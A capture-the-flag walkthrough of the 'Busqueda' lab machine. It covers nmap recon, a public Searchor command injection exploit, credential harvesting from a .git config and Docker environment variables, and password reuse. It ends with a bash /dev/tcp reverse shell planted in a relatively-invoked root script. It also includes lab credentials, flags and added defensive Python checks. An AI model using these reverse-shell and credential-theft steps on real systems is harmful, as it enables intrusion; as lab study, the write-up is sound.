Busqueda

IP: 10.129.228.217

Let's start with the Nmap scan.

nmap -sC -sV -o nmap 10.129.228.217
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-06 11:38 EST
Nmap scan report for 10.129.228.217
Host is up (0.35s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_  256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.92 seconds

We can see that port 22 (SSH) and port 80 (HTTP) are open, and the web server redirects to http://searcher.htb. Let's add that to the hosts file.

sudo nano /etc/hosts

Let's now visit the webpage.

This site lets us run queries against other sites such as Accuweather. At the bottom of the page we can also see that it is built with Flask and Searchor 2.4.0. A quick Google search shows that this version has a CVE assigned to it (a command injection).

So, let's follow the POC and try to get a shell.

git clone https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection.git

./exploit.sh searcher.htb 10.10.14.104

Let's check our Netcat listener.

rlwrap nc -nlvp 9001

Let's get our first flag now.

Flag: 73510de022f7a3527af03bb9744427a8

Now let's escalate our privileges to get to root. Let's list out the files.

ls -la

We can see that there's a .git folder. Let's check if we can find something interesting there.

cd .git

Nice! There is a config file here; we might get some creds from it.

cat config

[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[remote "origin"]
        url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
        fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
        remote = origin
        merge = refs/heads/main

The remote URL in the config gives us credentials: the username cody and the password jh1usoih2bkjaspwe92. As we saw in the nmap scan, SSH is open, so let's log in with them (the password works for the svc user on the box).
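Credentials embedded in a remote URL like the one above are exactly what a repository audit should catch. As an added defensive check (not part of the original writeup), the Python scanner below parses a .git/config and flags every remote whose URL carries userinfo, reporting a redacted URL rather than the secret itself. The sample config and its user/password values are constructed for this example.

```python
import configparser
import io
from urllib.parse import urlsplit

# Constructed sample .git/config (placeholder user and password, not values
# from any real system); the "origin" remote embeds credentials in its URL.
SAMPLE_GIT_CONFIG = """\
[core]
        repositoryformatversion = 0
        bare = false
[remote "origin"]
        url = http://someuser:s3cretpass@git.example.internal/team/app.git
        fetch = +refs/heads/*:refs/remotes/origin/*
[remote "mirror"]
        url = git@git.example.internal:team/app.git
[branch "main"]
        remote = origin
        merge = refs/heads/main
"""

def find_credentialed_remotes(config_text):
    """Return one dict per remote whose URL carries userinfo. The password is
    never returned, only whether one is present, so the finding itself is safe
    to log or attach to a ticket."""
    parser = configparser.ConfigParser(strict=False, interpolation=None)
    # git indents keys under each section; configparser accepts that as long
    # as the indentation is consistent within a section.
    parser.read_file(io.StringIO(config_text))
    findings = []
    for section in parser.sections():
        if not section.startswith('remote '):
            continue
        parts = urlsplit(parser.get(section, 'url', fallback=''))
        # scp-style git@host:path URLs have no scheme and carry no password
        if not parts.scheme or parts.username is None:
            continue
        host = parts.hostname or ''
        if parts.port:
            host += ':%d' % parts.port
        findings.append({
            'remote': section[len('remote '):].strip('"'),
            'username': parts.username,
            'has_password': parts.password is not None,
            'redacted_url': '%s://%s:***@%s%s' % (parts.scheme, parts.username, host, parts.path),
        })
    return findings

if __name__ == '__main__':
    for f in find_credentialed_remotes(SAMPLE_GIT_CONFIG):
        print('[!] remote %(remote)r embeds credentials for %(username)r '
              '(password present: %(has_password)s): %(redacted_url)s' % f)
```

Running it against a real checkout is a matter of reading .git/config from disk and passing the text in; the same check fits naturally into a pre-commit hook or a periodic scan of developer home directories.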

ssh svc@10.129.228.217

And we're in. Let's first check the sudo permissions for the user.

sudo -l

So, the user can run /usr/bin/python3 /opt/scripts/system-checkup.py * as root. Let's run it and see what we get.

sudo /usr/bin/python3 /opt/scripts/system-checkup.py *

Let's use the third option to perform a full system checkup.

sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

If we try to edit the system-checkup.py script, we don't have the permissions.

Nothing interesting to be found here. If we recall the config file, the creds were used on gitea.searcher.htb, so let's add that to our hosts file as well.

sudo nano /etc/hosts

So, let's check if we can find something interesting there.

We get the option to sign in, so let's use the creds we found.

And we're successfully logged in. We can see two users here: cody and administrator.

Under cody's account we can see the source code of the Searcher_site website. Going a few steps back, we missed something.

We can see that the docker-inspect action of system-checkup.py lets us inspect Docker containers.

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect

So, it follows a particular format. The usage information of the docker inspect command shows how its --format option works: if we pass it {{ json [selector] }}, whatever we give as the selector decides what is displayed. If we give it just . as the selector, it displays everything, which we pipe into jq to pretty-print.

sudo python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' gitea | jq .

Going through the output, we found something interesting: the container's environment holds the database credentials.

},
    "Tty": false,
    "OpenStdin": false,
    "StdinOnce": false,
    "Env": [
      "USER_UID=115",
      "USER_GID=121",
      "GITEA__database__DB_TYPE=mysql",
      "GITEA__database__HOST=db:3306",
      "GITEA__database__NAME=gitea",
      "GITEA__database__USER=gitea",
      "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "USER=git",
      "GITEA_CUSTOM=/data/gitea"
    ],

Now that we have MySQL creds, let's try to log in. First we need the IP of the database container, so let's get that from its network settings.

sudo python3 /opt/scripts/system-checkup.py docker-inspect '{{json .NetworkSettings.Networks}}' mysql_db | jq .

Let's log in now.

mysql -h 172.19.0.3 -u gitea -pyuiu1hoiu4i5ho1uh gitea

Let's first check for existing databases.

show databases;

gitea is the only interesting database we can find.

use gitea;
show tables;

The user table looks interesting so let's check that.

select * from user;

The output looks like gibberish, so let's display specific columns only.

select name,email,passwd from user;

We got the hash for the administrator user. Before trying to crack the hash, let's first try to log in to Gitea as administrator by reusing the password we got for the MySQL database.

And we're logged in as administrator. Let's check the scripts we have in this repository.

So, we found the same scripts we were trying to execute earlier. Let's do some code analysis.

Checking the system-checkup.py script, we can see that it just runs the three commands mentioned. The interesting part is:

    elif action == 'full-checkup':
        try:
            # relative path: resolved against the caller's current working directory, not the script's own
            arg_list = ['./full-checkup.sh']
            print(run_command(arg_list))
            print('[+] Done!')
        except:
            print('Something went wrong')
            exit(1)

When handling full-checkup, it runs ./full-checkup.sh, a relative path that is resolved against the current working directory rather than the script's own directory. So if we place our own full-checkup.sh in a directory we control and start system-checkup.py full-checkup from there, our file runs as root. Let's try this.
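As an added example (not the box's script or the writeup's own code), here is how the full-checkup handler could be hardened in Python: the helper is resolved against a fixed scripts directory (assumed to be /opt/scripts, as on this box) and refused unless it is a regular root-owned file that nobody else can write, so a full-checkup.sh dropped in the caller's working directory is never executed. The demo() function and its temporary-directory scenario are constructed for this example.

```python
import os
import stat
import subprocess
import tempfile

def trusted_helper_path(name, scripts_dir):
    """Resolve helper `name` inside scripts_dir; refuse anything not a root-owned, non-writable regular file."""
    if os.sep in name or name in ('', '.', '..'):
        raise ValueError('helper name must be a bare filename: %r' % name)
    base = os.path.realpath(scripts_dir)
    path = os.path.realpath(os.path.join(base, name))
    # realpath follows symlinks, so a link pointing outside the directory is caught here
    if os.path.dirname(path) != base:
        raise PermissionError('helper escaped the scripts directory: %s' % path)
    st = os.stat(path)
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError('not a regular file: %s' % path)
    if st.st_uid != 0:
        raise PermissionError('helper not owned by root: %s' % path)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError('helper is group/world writable: %s' % path)
    return path

def full_checkup(scripts_dir='/opt/scripts'):
    # Validated absolute path inside the assumed scripts directory: the caller's
    # working directory no longer decides which full-checkup.sh runs.
    path = trusted_helper_path('full-checkup.sh', scripts_dir)
    return subprocess.run([path], capture_output=True, text=True, check=True).stdout

def demo():
    """Constructed scenario: an unprivileged user drops a world-writable
    full-checkup.sh into a directory they control. Returns what each check did."""
    outcome = {}
    with tempfile.TemporaryDirectory() as d:
        rogue = os.path.join(d, 'full-checkup.sh')
        with open(rogue, 'w') as f:
            f.write('#!/bin/sh\necho this should never run as root\n')
        os.chmod(rogue, 0o777)
        try:
            full_checkup(d)
            outcome['writable_helper'] = 'executed'
        except PermissionError:
            outcome['writable_helper'] = 'rejected'
        try:
            trusted_helper_path('../full-checkup.sh', d)
            outcome['traversal'] = 'accepted'
        except ValueError:
            outcome['traversal'] = 'rejected'
    return outcome
```

Calling demo() returns {'writable_helper': 'rejected', 'traversal': 'rejected'} whether it runs as root (caught by the writable-bits check) or as a normal user (caught by the ownership check). The sudo rule's trailing * still lets the user choose the action, so the ownership and permission checks, not the sudoers line, are what close this hole.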

nano full-checkup.sh

Now we can update the script to include a reverse shell.

bash -i >& /dev/tcp/10.10.14.104/443 0>&1

Let's check our Netcat listener.

rlwrap nc -nlvp 443

Now let's get our root flag.

Flag: 36ea04a120e1d295ac9646a7dcc714ce